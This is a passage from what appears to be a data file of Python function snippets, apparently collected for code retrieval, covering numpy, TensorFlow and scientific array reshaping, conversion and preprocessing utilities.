mesh_data = np.transpose(mesh_data, axes=[2,1,0])\r\n mesh_data = mesh_data.reshape(-1, N)\r\n return mesh_data", "def vector3(x, y, z):\n return np.array([x, y, z], dtype=float)", "def xyz(self) -> np.ndarray:\n return np.vstack((self.x, self.y, self.z)).transpose()", "def transform(self, data):\n self.cube = self.trf.transform(data)", "def reshape(data):\n return K.reshape(x=data, shape=(K.shape(data)[0], 1, reshape_size))", "def __array__(self):\n return np.asarray(self.data)", "def make_ndarray(data: list, convert=False):\n data_height = data[0].shape[0]\n data_width = data[0].shape[1]\n if len(data[0].shape) == 3:\n data_channels = data[0].shape[2]\n nd_data = np.zeros((len(data), data_height, data_width, data_channels), dtype=np.float32)\n\n else:\n nd_data = np.zeros((len(data), data_height, data_width), dtype=np.float32)\n\n if convert:\n for _ in range(len(data)):\n nd_data[_] = tf.keras.layers.Lambda(lambda x: x / 255)(data[_])\n\n else:\n for _ in range(len(data)):\n nd_data[_] = data[_]\n\n return nd_data", "def get_3d_H(H1):\n H_fin = [H1[0,0], 0, H1[0,1], H1[0,2], 0, 1, 0, 0, H1[1,0], 0, H1[1,1], H1[1,2]]\n H_fin = np.array(H_fin).reshape(3,4)\n return H_fin", "def reshape(arr):\r\n reshape_arr = np.empty((3,240,320),dtype='float32')\r\n reshape_arr[0,:,:] = arr[:,:,0]\r\n reshape_arr[1,:,:] = arr[:,:,1]\r\n reshape_arr[2,:,:] = arr[:,:,2]\r\n return reshape_arr", "def array(self):\n return np.array([self.w, self.x, self.y, self.z])", "def atleast_3d(*arys):\n res = []\n for a in arys:\n if not isinstance(a, cupy.ndarray):\n raise TypeError('Only cupy arrays can be atleast_3d')\n if a.ndim == 0:\n a = a.reshape(1, 1, 1)\n elif a.ndim == 1:\n a = a[cupy.newaxis, :, cupy.newaxis]\n elif a.ndim == 2:\n a = a[:, :, cupy.newaxis]\n res.append(a)\n if len(res) == 1:\n res = res[0]\n return res", "def vector3(x, y, z):\n return np.array([x, y, z], dtype=np.float)", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_circs = 0\n self._n_shots = 0\n self._n_slots = 0\n self._n_iq = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError:\n try:\n # level1 data averaged over shots\n self._n_circs, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"Data given to {self.__class__.__name__} is not likely level1 data.\"\n ) from ex\n\n if self._validate:\n if self._n_iq != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} does not have two-dimensions \"\n f\"(I and Q). Instead, {self._n_iq} dimensions were found.\"\n )\n\n return data", "def numpy_to_cube(np_array, similar_cube, dimensions):\n\n new_cube = iris.cube.Cube.copy(similar_cube) # copy similar cube\n\n # time, lat, lon\n if dimensions == 3:\n new_cube.data[:,:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:,:] = np_array # fill with numpy array data\n\n # lat, lon\n elif dimensions == 2:\n new_cube.data[:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:] = np_array # fill with numpy array data\n\n # either time, lat or lon only\n elif dimensions == 1:\n new_cube.data[:] = np.nan # convert new cube entries to nan\n new_cube.data[:] = np_array # fill with numpy array data\n\n # return the numpy array, failed to convert to a cube\n else:\n print('failed to convert')\n new_cube = np_array\n\n return new_cube", "def readpil3d(self):\r\n\r\n # Read the data in as an array.\r\n res = np.loadtxt(self.name, delimiter=' ')\r\n\r\n # Split into useful chunks\r\n self.pos = res[:, 0:3] # Grid point locations\r\n self.Pn = res[:, 3:4] # Normal pressure [Pa]\r\n self.flux = res[:, -1] # Flux\r", "def get3dPCA(data):\n\n return PCA(n_components = 3).fit_transform(data)", "def jointsImgTo3D(sample):\n ret = np.zeros((sample.shape[0], 3), np.float32)\n for i in range(sample.shape[0]):\n ret[i] = jointImgTo3D(sample[i])\n return ret", "def _to_arraylike(data):\n _load_objects()\n if data is None:\n raise ValueError('Cannot convert None data.')\n return None\n if not isinstance(data, (ndarray, DataArray, DataFrame, Series, Index)):\n data = np.asarray(data)\n if not np.iterable(data):\n data = np.atleast_1d(data)\n return data", "def _reshape(self, data):\n batch_size, height, width, n_channels = data.shape\n if self._grid_height:\n grid_height = self._grid_height\n else:\n grid_height = int(math.floor(math.sqrt(batch_size)))\n\n grid_width = int(math.ceil(batch_size/grid_height))\n\n if n_channels == 1:\n data = np.tile(data, (1, 1, 1, 3))\n n_channels = 3\n\n if n_channels != 3:\n raise ValueError('Image batch must have either 1 or 3 channels, but '\n 'was {}'.format(n_channels))\n\n shape = (height * grid_height, width * grid_width, n_channels)\n buf = np.full(shape, 255, dtype=np.uint8)\n multiplier = 1 if data.dtype in (np.int32, np.int64) else 255\n\n for k in range(batch_size):\n i = k // grid_width\n j = k % grid_width\n arr = data[k]\n x, y = i * height, j * width\n buf[x:x + height, y:y + width, :] = np.clip(\n multiplier * arr, 0, 255).astype(np.uint8)\n\n if self._zoom > 1:\n buf = buf.repeat(self._zoom, axis=0).repeat(self._zoom, axis=1)\n return buf", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def _handle_input_data(data):\n data = np.asarray(data)\n if np.ndim(data) == 1:\n d_rows = 1\n d_cols = len(data)\n data = data.reshape((1, data.shape[0]))\n elif np.ndim(data) == 2:\n d_rows = data.shape[0]\n d_cols = data.shape[1]\n else:\n raise ValueError(\"Incorrect dimensionality of data. Must be <= 2\")\n return data, d_rows, d_cols", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 0] * self.scale", "def get_A3():\n\n return array([[0.68557183+0.46550108j, 0.12934765-0.1622676j,\n 0.24409518+0.25335939j],\n [0.1531015 + 0.66678983j, 0.45112492+0.18206976j,\n -0.02633966+0.43477693j],\n [-0.10817164-1.16879196j, -0.18446849+0.03755672j,\n 0.06430325-0.44757084j]])", "def check_array_3D(X, coerce_to_numpy=True, is_univariate=False, min_timestamps=2):\n X = check_is_numpy_or_pd(X)\n if X.ndim != 3:\n raise ValueError(\n \"If passed as a np.array, X must be a 3-dimensional \"\n \"array, but found shape: {}\".format(X.shape)\n )\n if X.size == 0:\n raise ValueError(\n \"Input is empty or have a dimension of size 0\"\n \", found shape: {}\".format(X.shape)\n )\n if X.shape[2] <= min_timestamps:\n raise ValueError(\n \"Input should have more than {} timestamp\"\n \", found only: {}\".format(min_timestamps,X.shape[2])\n )\n if isinstance(X, pd.DataFrame):\n raise ValueError('Only accepting numpy array as inputs for 3D')\n if is_univariate:\n if X.shape[1] != 1:\n raise ValueError(\n \"X must be a 3-dimensional array with dimension 1 equal to 1\"\n )\n return X", "def data():\n return RaggedArray(\n [[0, 1], [1, 2, 3, 4], [], [-1, -2], []]*20, dtype='float64')", "def test_3d_tranpose(): \n dic,data = ng.pipe.read_lowmem(\"common_data/3d_pipe/ft/test%03d.ft3\")\n fdic,fdata = ng.pipe.read(\"common_data/3d_pipe/ft/test%03d.ft3\")\n\n assert_array_equal(data.transpose()[0,1,2],fdata.transpose()[0,1,2])\n assert_array_equal(data.transpose((2,0,1))[0,1,2],\n fdata.transpose((2,0,1))[0,1,2])\n assert_array_equal(data.swapaxes(0,1)[0,1,2],fdata.swapaxes(0,1)[0,1,2])\n assert_array_equal(data.swapaxes(2,0)[0,1,2],fdata.swapaxes(2,0)[0,1,2])", "def unet3d(input_shape, data_format='channels_first'):\n i = Input(shape=input_shape)\n\n down1, c1 = downconv_block(i, 16, 3)\n down2, c2 = downconv_block(down1, 32, 3)\n down3, c3 = downconv_block(down2, 64, 3)\n\n up1 = upconv_block(down3, 128, 3)\n crop1 = crop(c3, up1)\n merge_block = [up1, crop1]\n concat = concatenate(merge_block, axis=1)\n\n up2 = upconv_block(concat, 64, 3)\n crop2 = crop(c2, up2)\n merge_block = [up2, crop2]\n concat = concatenate(merge_block, axis=1)\n\n up3 = upconv_block(concat, 32, 3)\n crop3 = crop(c1, up3)\n merge_block = [up3, crop3]\n concat = concatenate(merge_block, axis=1)\n\n out1 = Conv3D(16, 3, activation='relu',\n padding='same', data_format=data_format)(concat)\n out2 = Conv3D(16, 3, activation='relu',\n padding='same', data_format=data_format)(out1)\n out3 = Conv3D(1, 1, activation='sigmoid',\n padding='same', data_format=data_format)(out2)\n\n model = Model(inputs=[i], outputs=[out3])\n\n return model", "def list_plot3d_array_of_arrays(v, interpolation_type, texture, **kwds):\n m = matrix(RDF, len(v), len(v[0]), v)\n G = list_plot3d(m, interpolation_type, texture, **kwds)\n G._set_extra_kwds(kwds)\n return G", "def _process(self, data: np.ndarray) -> np.ndarray:", "def _process(self, data: np.ndarray) -> np.ndarray:", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 1] * self.scale", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def convert_data(self, channel, data):\n if not isinstance(data, np.ndarray):\n raise ValueError(\"data has to be numpy array\")\n\n # convert vDeflection from encoded to distance to force with linear conversion factors\n # the returned object is already a numpy ndarray in unit Newton (N)\n if channel == 'vDeflection':\n\n raw_m = self.properties.conversion_factors[channel][\"raw multiplier\"]\n raw_n = self.properties.conversion_factors[channel][\"raw offset\"]\n\n dist_m = self.properties.conversion_factors[channel][\"distance multiplier\"]\n dist_n = self.properties.conversion_factors[channel][\"distance offset\"]\n\n force_m = self.properties.conversion_factors[channel][\"force multiplier\"]\n force_n = self.properties.conversion_factors[channel][\"force offset\"]\n\n converted_data = ((raw_m * data + raw_n) * dist_m + dist_n) * force_m + force_n\n\n return converted_data\n\n # convert height from encoded to calibrated height\n # the returned object is already a numpy ndarray in unit Meter (m)\n elif channel == 'height':\n raw_m = self.properties.conversion_factors[channel][\"raw multiplier\"]\n raw_n = self.properties.conversion_factors[channel][\"raw offset\"]\n\n cal_m = self.properties.conversion_factors[channel][\"calibrated multiplier\"]\n cal_n = self.properties.conversion_factors[channel][\"calibrated offset\"]\n\n converted_data = (raw_m * data + raw_n) * cal_m + cal_n\n\n return converted_data\n\n else:\n raise ValueError(\"not a valid channel\")", "def _process(self, data: np.ndarray) -> np.ndarray:\n if not self.is_trained:\n raise DataProcessorError(\"SVD must be trained on data before it can be used.\")\n\n # IQ axis is reduced by projection\n if self._n_shots == 0:\n # level1 average mode\n dims = self._n_circs, self._n_slots\n else:\n # level1 single mode\n dims = self._n_circs, self._n_shots, self._n_slots\n\n projected_data = np.zeros(dims, dtype=object)\n\n for idx in range(self._n_slots):\n scale = self.parameters.scales[idx]\n axis = self.parameters.main_axes[idx]\n mean_i = self.parameters.i_means[idx]\n mean_q = self.parameters.q_means[idx]\n\n if self._n_shots != 0:\n # Single shot\n for circ_idx in range(self._n_circs):\n centered = [\n data[circ_idx, :, idx, 0] - mean_i,\n data[circ_idx, :, idx, 1] - mean_q,\n ]\n projected_data[circ_idx, :, idx] = axis @ np.array(centered) / scale\n else:\n # Averaged\n centered = [data[:, idx, 0] - mean_i, data[:, idx, 1] - mean_q]\n projected_data[:, idx] = axis @ np.array(centered) / scale\n\n return projected_data", "def _reshape_output(self, output):\n output = np.transpose(output, [0, 2, 3, 1])\n _, height, width, _ = output.shape\n dim1, dim2 = height, width\n dim3 = 3\n # There are CATEGORY_NUM=80 object categories:\n dim4 = (4 + 1 + CATEGORY_NUM)\n return np.reshape(output, (dim1, dim2, dim3, dim4))", "def to_numpy(x):\r\n return x.squeeze().detach().cpu().numpy()", "def flatten_data(data):\r\n result = []\r\n for mesurements in data:\r\n result.append(mesurements.flatten())\r\n return np.array(result)", "def transform(self, x: Array2D) -> Array2D:", "def to_fits_array(self):\n return self.data", "def _serialize(self, data):\n data = [np.array(j) for j in data]\n self._data_shape_list = [j.shape for j in data]\n serialized_data = [j.ravel() for j in data]\n serialized_data = np.hstack(serialized_data)\n return serialized_data", "def read_array(X, Y, Z):\n if isinstance(X, cls) and Y is None and Z is None:\n return cls(X.x, X.y, X.z)\n if (isinstance(X, (list, tuple, np.ndarray)) and len(X) == 3 and\n Y is None and Z is None):\n return cls(X[0], X[1], X[2])\n if X is None and Y is None and Z is None:\n return cls(0, 0, 0)\n if np.isscalar(X) and np.isscalar(Y) and np.isscalar(Z):\n xyz = np.r_[X, Y, Z]\n xyz = xyz.astype(float)\n return xyz.view(cls)\n raise ValueError('Invalid input for Vector3 - must be an instance '\n 'of a Vector3, a length-3 array, 3 scalars, or '\n 'nothing for [0., 0., 0.]')", "def transform(self, chunks):\n data = np.array([chunk.flatten() for chunk in chunks])\n\n return data", "def processing_data(raw_data):\n data = np.frombuffer(raw_data, np.uint8)\n data = np.reshape(data, [data.shape[0]//1029, -1])\n data = data[:, 5:]\n data = np.reshape(data, [1, -1])\n data = 256 * data[0, 0::2] + data[0, 1::2]\n data = 10 * (data / 65535)\n data = np.reshape(data, [-1, 8]).T\n return data", "def _deserialize(self, data):\n\n firstInd = 0\n deserialized_data = []\n for shp in self._data_shape_list:\n if len(shp) > 1:\n shift = np.prod(shp)\n elif len(shp) == 0:\n shift = 1\n else:\n shift = shp[0]\n tmp_array = data[firstInd:firstInd+shift]\n tmp_array = tmp_array.reshape(shp)\n deserialized_data.append(tmp_array)\n firstInd += shift\n return deserialized_data", "def ma2np(self):\n try:\n self.mask = self.Zarr.mask\n self.Zarr = ma.getdata(self.Zarr)\n except: print 'Data array is already numpy array'\n return", "def _data_reshape(self, data):\n data_offset = [int(size / 2) for size in data.shape[1:]]\n data_diff = [int(size / 2) for size in self.shape]\n data_diff_min = data_diff\n data_diff_max = []\n for i, elem in enumerate(data_diff):\n if self.shape[i] % 2 == 0:\n data_diff_max.append(elem)\n else:\n data_diff_max.append(elem + 1)\n data = data[:, (data_offset[0] - data_diff_min[0]):(data_offset[0] + data_diff_max[0]),\n (data_offset[1] - data_diff_min[1]):(data_offset[1] + data_diff_max[1]),\n (data_offset[2] - data_diff_min[2]):(data_offset[2] + data_diff_max[2])]\n\n if data.shape[1] == 1:\n data = data.reshape(data.shape[0], data.shape[2], data.shape[3])\n return data", "def get_data():\n data = [np.array([32.,595.]),\n np.array([30.,599.]),\n np.array([18.,622.]),\n np.array([51.,606.]),\n np.array([38.,578.])]\n return data", "def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if out_arr.shape != (3,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr", "def _reshape_channels(x):\n assert x.dim() == 4\n batch_size, nc, h, w = x.size()\n x_t = x.view(batch_size, nc, -1).transpose(1, 2).contiguous()\n x_t = x_t.view(batch_size, h, w, nc)\n return x_t", "def MakeCoordinates3D(self):\n\n self.points = np.concatenate((self.points, np.zeros((self.points.shape[0],1)) ), axis=1)\n self.points = np.ascontiguousarray(self.points)", "def from_numpy(data, transform, nodata=None, attrs={}, crs=None):\n nrow, ncol = data.shape[-2:]\n dims = (\"y\", \"x\")\n if len(data.shape) == 3:\n dims = (\"dim0\",) + dims\n elif len(data.shape) != 2:\n raise ValueError(\"Only 2D and 3D arrays supported\")\n da = xr.DataArray(\n data,\n dims=dims,\n coords=gis_utils.affine_to_coords(transform, (nrow, ncol)),\n )\n da.raster.set_spatial_dims(x_dim=\"x\", y_dim=\"y\")\n da.raster.set_nodata(nodata=nodata) # set _FillValue attr\n if attrs:\n da.attrs.update(attrs)\n if crs is not None:\n da.raster.set_crs(input_crs=crs)\n return da", "def image_to_array(self, img):\n x = np.asarray(img, dtype=self.dtype)\n if len(x.shape) == 3:\n if self.channels_first:\n x = x.transpose(2, 0, 1)\n elif len(x.shape) == 2:\n if self.channels_first:\n x = x.reshape((1, x.shape[0], x.shape[1]))\n else:\n x = x.reshape((x.shape[0], x.shape[1], 1))\n else:\n raise ValueError('Unsupported image shape: ', x.shape)\n return x", "def _preprocess_data_3d(\n self, data_batch: Dict[str, Any]) -> Tuple[tf.Tensor, tf.Tensor]:\n world2grid = data_batch['world2grid']\n uniform_samples = data_batch['uniform_samples']\n near_surface_samples = data_batch['near_surface_samples']\n if 'uniform_samples_per_camera' in data_batch:\n uniform_samples_per_camera = data_batch['uniform_samples_per_camera']\n if 'near_surface_samples_per_camera' in data_batch:\n near_surface_samples_per_camera = data_batch[\n 'near_surface_samples_per_camera']\n if 'depth_xyzn_per_camera' in data_batch:\n depth_xyzn_per_camera = data_batch['depth_xyzn_per_camera']\n\n batch_size = data_batch['near_surface_samples'].shape[0]\n spatial_dims = data_batch['grid_samples'].shape[1:4]\n\n # Assume grid size is the same in all dimensions.\n grid_size = spatial_dims[0]\n\n # Generate normalized [-1, 1] coordinates for grid samples.\n _, pixels_grid = point_sampling.sample3d_all_pixels(\n spatial_dims, normalize=True)\n pixels_grid = tf.tile(pixels_grid[None, ...], [batch_size, 1, 1, 1, 1])\n data_batch['grid_samples'] = tf.concat(\n [pixels_grid, data_batch['grid_samples']], axis=-1)\n # Tensor with shape [batch_size, dim_d, dim_h, dim_w, 4], (z, y, x).\n\n # Transform to grid space [0, 127] and map grid space [-0.5, 127.5] to\n # [-1, 1].\n uniform_samples = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n uniform_samples[..., :3],\n tf.ones(\n [batch_size, tf.shape(uniform_samples)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n # Tensor with shape [batch_size, 3, num_point].\n\n uniform_samples = (uniform_samples + 0.5) * 2.0 / grid_size - 1\n uniform_samples = uniform_samples[:, ::-1, :] # Convert to (z, y, x).\n uniform_samples = tf.concat([\n tf.transpose(uniform_samples, [0, 2, 1]),\n data_batch['uniform_samples'][..., 3:]\n ],\n axis=-1)\n data_batch['uniform_samples'] = uniform_samples\n\n near_surface_samples = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n near_surface_samples[..., :3],\n tf.ones([batch_size,\n tf.shape(near_surface_samples)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n near_surface_samples = (near_surface_samples + 0.5) * 2.0 / grid_size - 1\n near_surface_samples = near_surface_samples[:, ::-1, :]\n near_surface_samples = tf.concat([\n tf.transpose(near_surface_samples, [0, 2, 1]),\n data_batch['near_surface_samples'][..., 3:]\n ],\n axis=-1)\n data_batch['near_surface_samples'] = near_surface_samples\n\n if 'uniform_samples_per_camera' in data_batch:\n num_view = tf.shape(uniform_samples_per_camera)[1]\n num_point_per_view = tf.shape(uniform_samples_per_camera)[2]\n num_channel = tf.shape(uniform_samples_per_camera)[3]\n uniform_samples_per_camera = tf.reshape(uniform_samples_per_camera,\n [batch_size, -1, num_channel])\n uniform_samples_per_camera = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n uniform_samples_per_camera[..., :3],\n tf.ones(\n [batch_size,\n tf.shape(uniform_samples_per_camera)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n uniform_samples_per_camera = (uniform_samples_per_camera +\n 0.5) * 2.0 / grid_size - 1\n uniform_samples_per_camera = uniform_samples_per_camera[:, ::-1, :]\n uniform_samples_per_camera = tf.reshape(\n tf.transpose(uniform_samples_per_camera, [0, 2, 1]),\n [batch_size, num_view, num_point_per_view, -1])\n # Tensor with shape [batch_size, num_view, num_point_per_view, 3].\n\n uniform_samples_per_camera = tf.concat([\n uniform_samples_per_camera,\n data_batch['uniform_samples_per_camera'][..., 3:]\n ],\n axis=-1)\n data_batch['uniform_samples_per_camera'] = uniform_samples_per_camera\n\n if 'near_surface_samples_per_camera' in data_batch:\n num_view = tf.shape(near_surface_samples_per_camera)[1]\n num_point_per_view = tf.shape(near_surface_samples_per_camera)[2]\n num_channel = tf.shape(near_surface_samples_per_camera)[3]\n near_surface_samples_per_camera = tf.reshape(\n near_surface_samples_per_camera, [batch_size, -1, num_channel])\n near_surface_samples_per_camera = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n near_surface_samples_per_camera[..., :3],\n tf.ones([\n batch_size,\n tf.shape(near_surface_samples_per_camera)[1], 1\n ],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n near_surface_samples_per_camera = (near_surface_samples_per_camera +\n 0.5) * 2.0 / grid_size - 1\n near_surface_samples_per_camera = near_surface_samples_per_camera[:, ::\n -1, :]\n near_surface_samples_per_camera = tf.reshape(\n tf.transpose(near_surface_samples_per_camera, [0, 2, 1]),\n [batch_size, num_view, num_point_per_view, -1])\n # Tensor with shape [batch_size, num_view, num_point_per_view, 3].\n\n near_surface_samples_per_camera = tf.concat([\n near_surface_samples_per_camera,\n data_batch['near_surface_samples_per_camera'][..., 3:]\n ],\n axis=-1)\n data_batch[\n 'near_surface_samples_per_camera'] = near_surface_samples_per_camera\n\n if 'depth_xyzn_per_camera' in data_batch:\n num_view = tf.shape(depth_xyzn_per_camera)[1]\n num_point_per_view = tf.shape(depth_xyzn_per_camera)[2]\n num_channel = tf.shape(depth_xyzn_per_camera)[3]\n depth_xyzn_per_camera = tf.reshape(depth_xyzn_per_camera,\n [batch_size, -1, num_channel])\n depth_xyzn_per_camera = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n depth_xyzn_per_camera[..., :3],\n tf.ones([batch_size,\n tf.shape(depth_xyzn_per_camera)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n depth_xyzn_per_camera = (depth_xyzn_per_camera +\n 0.5) * 2.0 / grid_size - 1\n depth_xyzn_per_camera = depth_xyzn_per_camera[:, ::-1, :]\n depth_xyzn_per_camera = tf.reshape(\n tf.transpose(depth_xyzn_per_camera, [0, 2, 1]),\n [batch_size, num_view, num_point_per_view, -1])\n # Tensor with shape [batch_size, num_view, num_point_per_view, 3].\n\n depth_xyzn_per_camera = tf.concat(\n [depth_xyzn_per_camera, data_batch['depth_xyzn_per_camera'][..., 3:]],\n axis=-1)\n data_batch['depth_xyzn_per_camera'] = depth_xyzn_per_camera\n\n # Scale SDF\n data_batch['grid_samples'] = data_batch['grid_samples'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, None, None, :]\n data_batch['uniform_samples'] = data_batch['uniform_samples'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, :]\n data_batch['near_surface_samples'] = data_batch['near_surface_samples'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, :]\n if 'uniform_samples_per_camera' in data_batch:\n data_batch['uniform_samples_per_camera'] = data_batch['uniform_samples_per_camera'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, None, :]\n if 'near_surface_samples_per_camera' in data_batch:\n data_batch['near_surface_samples_per_camera'] = data_batch['near_surface_samples_per_camera'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, None, :]\n\n input_data = data_batch['grid_samples'][..., 3:4]\n # Tensor with shape [batch_size, dim_d, dim_h, dim_w, 1].\n\n gt_data = input_data\n\n return input_data, gt_data", "def _make_array(x):\n try:\n x = np.asfarray(x).squeeze()\n except ValueError:\n pass\n return x", "def _convert_data(self, data):\n if isinstance(data, Tensor):\n data = data.asnumpy()\n elif isinstance(data, list):\n data = np.array(data)\n elif isinstance(data, np.ndarray):\n pass\n else:\n raise TypeError('Input data type must be tensor, list or numpy.ndarray')\n return data", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_shots = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"The data given to {self.__class__.__name__} does not have the shape of \"\n \"single-shot IQ data; expecting a 4D array.\"\n ) from ex\n\n if self._validate:\n if data.shape[-1] != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} must be a multi-dimensional array\"\n \"of dimension [d0, d1, ..., 2] in which the last dimension \"\n \"corresponds to IQ elements.\"\n f\"Input data contains element with length {data.shape[-1]} != 2.\"\n )\n\n if self._validate:\n if isinstance(self._discriminator, list):\n if self._n_slots != len(self._discriminator):\n raise DataProcessorError(\n f\"The Discriminator node has {len(self._discriminator)} which does \"\n f\"not match the {self._n_slots} slots in the data.\"\n )\n\n return unp.nominal_values(data)", "def xr_dataset_to_array(ds, z_coord):\n # Determine the size of the dataset\n nvars = len(ds.keys())\n nvals = len(ds.coords[z_coord].values)\n \n # Create an empty array to store the data\n data = np.zeros((nvals, nvars+1))\n units = []\n \n # Insert the depth coordinate\n data[:,0] = ds.coords[z_coord].values\n units.append(ds.coords[z_coord].attrs['units'])\n \n # Insert the rest of the data\n variables = list(ds.keys())\n for i in range(len(variables)):\n data[:,i+1] = ds[variables[i]].values\n units.append(ds[variables[i]].attrs['units'])\n \n # Create a list of variables names\n names = [z_coord] + variables\n \n # Return the data\n return (data, names, units)", "def canonicalize(data):\n data = data.transpose(*[d for d in map(data.axes.find, 'TCIZYX') if d >= 0])\n projection = []\n\n if 'T' in data.axes and data.shape[0] == 1:\n projection.append(0) # remove trivial T dimension\n\n if 'C' not in data.axes:\n projection.append(None) # add trivial C dimension\n elif projection:\n projection.append(slice(None))\n\n if projection:\n projection += [slice(None) for d in 'ZYX']\n data = data.lazyget(tuple(projection))\n \n return data", "def _to_arrays(particle, count: int):\n if (\n isinstance(particle, np.ndarray)\n and len(particle.shape) == 2\n and particle.shape[0] == 4\n ):\n # Multiple particles provided\n return particle\n\n elif len(particle) == 4:\n # One particle\n out = np.zeros((4, count))\n out[0] += particle[0]\n out[1] += particle[1]\n out[2] += particle[2]\n out[3] += particle[3]\n\n return out\n\n raise ValueError(\n f\"target shape invalid: should either be a length-4 iterable [x, y, z, t] or a shape (4, N) array\\nGot {type(particle)}\"\n )", "def preprocess_3d(im_stack):\n im_stack /= 127.5\n im_stack -= 1.0\n return im_stack", "def get3d(infile, histname, subdir='',verbose=False): \n\n ## 2d Histogram\n Hist = getter(infile,histname,subdir,verbose)\n\n nbinsX, nbinsY, nbinsZ = Hist.GetNbinsX(), Hist.GetNbinsY(), Hist.GetNbinsZ()\n Arr = np.zeros((nbinsZ,nbinsY,nbinsX))\n dArr = np.zeros((nbinsZ,nbinsY,nbinsX))\n axesX = np.zeros(nbinsX)\n axesY = np.zeros(nbinsY)\n axesZ = np.zeros(nbinsZ)\n edgesX = np.zeros(nbinsX+1)\n edgesY = np.zeros(nbinsY+1)\n edgesZ = np.zeros(nbinsZ+1)\n for j in xrange(0,nbinsX):\n axesX[j] = Hist.GetXaxis().GetBinCenter(j+1)\n edgesX[j] = Hist.GetXaxis().GetBinLowEdge(j+1)\n edgesX[nbinsX] = Hist.GetXaxis().GetBinLowEdge(nbinsX+1)\n\n for j in xrange(0,nbinsY):\n axesY[j] = Hist.GetYaxis().GetBinCenter(j+1)\n edgesY[j] = Hist.GetYaxis().GetBinLowEdge(j+1)\n edgesY[nbinsY] = Hist.GetYaxis().GetBinLowEdge(nbinsY+1)\n\n for j in xrange(0,nbinsZ):\n axesZ[j] = Hist.GetZaxis().GetBinCenter(j+1)\n edgesZ[j] = Hist.GetZaxis().GetBinLowEdge(j+1)\n edgesZ[nbinsZ] = Hist.GetZaxis().GetBinLowEdge(nbinsZ+1)\n\n axes = [axesX, axesY, axesZ]\n edges = [edgesX, edgesY, edgesZ]\n \n for j in xrange(0,nbinsX):\n for k in xrange(0,nbinsY):\n for l in xrange(0,nbinsZ):\n Arr[l,k,j] = Hist.GetBinContent(j+1,k+1,l+1)\n dArr[l,k,j] = Hist.GetBinError(j+1,k+1,l+1)\n \n return axes, edges, Arr, dArr", "def preprocess(self, in_array):\n event = teca_time_py_event('teca_deeplab_ar_detect::preprocess')\n\n nx_in = in_array.shape[1]\n ny_in = in_array.shape[0]\n\n # get the padding sizes to make the mesh evenly divisible by 64 in the\n # x direction and 128 in the y direction\n ng_x0, ng_x1 = self.get_padding_sizes(64.0, nx_in)\n ng_y0, ng_y1 = self.get_padding_sizes(128.0, ny_in)\n\n nx_out = ng_x0 + ng_x1 + nx_in\n ny_out = ng_y0 + ng_y1 + ny_in\n\n # allocate a new larger array\n out_array = np.zeros((1, 3, ny_out, nx_out), dtype=np.float32)\n\n # copy the input array into the center\n out_array[:, :, ng_y0 : ng_y0 + ny_in,\n ng_x0 : ng_x0 + nx_in] = in_array\n\n # cache the padding info in order to extract the result\n self.ng_x0 = ng_x0\n self.ng_y0 = ng_y0\n self.nx_in = nx_in\n self.ny_in = ny_in\n\n return out_array", "def flat_to_2d(data, det_width):\n return data.reshape((data.shape[0], data.shape[1], det_width, det_width))", "def scale_on_3d(x3d, scaler):\n (n_segs, n_concat, n_freq) = x3d.shape\n x2d = x3d.reshape((n_segs * n_concat, n_freq))\n x2d = scaler.transform(x2d)\n x3d = x2d.reshape((n_segs, n_concat, n_freq))\n return x3d", "def normalize_data(data, n=1):\n\n if isinstance(data, str):\n # TODO: could Antti comment on this?\n # numpy array initialization works unintuitively with strings\n data = np.array([[data]], dtype=object)\n else:\n data = np.atleast_1d(data)\n\n if data.ndim == 1:\n if data.shape[0] == n:\n data = data[:, None]\n else:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n else:\n if data.shape[0] != n:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n return data", "def newVectorArray(numpart:int, ndim:int = 0, data_type=float, data_order:str='F') -> NP.ndarray:\n if ndim <= 0:\n ndim = pympscore.GetSpaceDim()\n return NP.empty((numpart,ndim), dtype=data_type, order=data_order)" ]
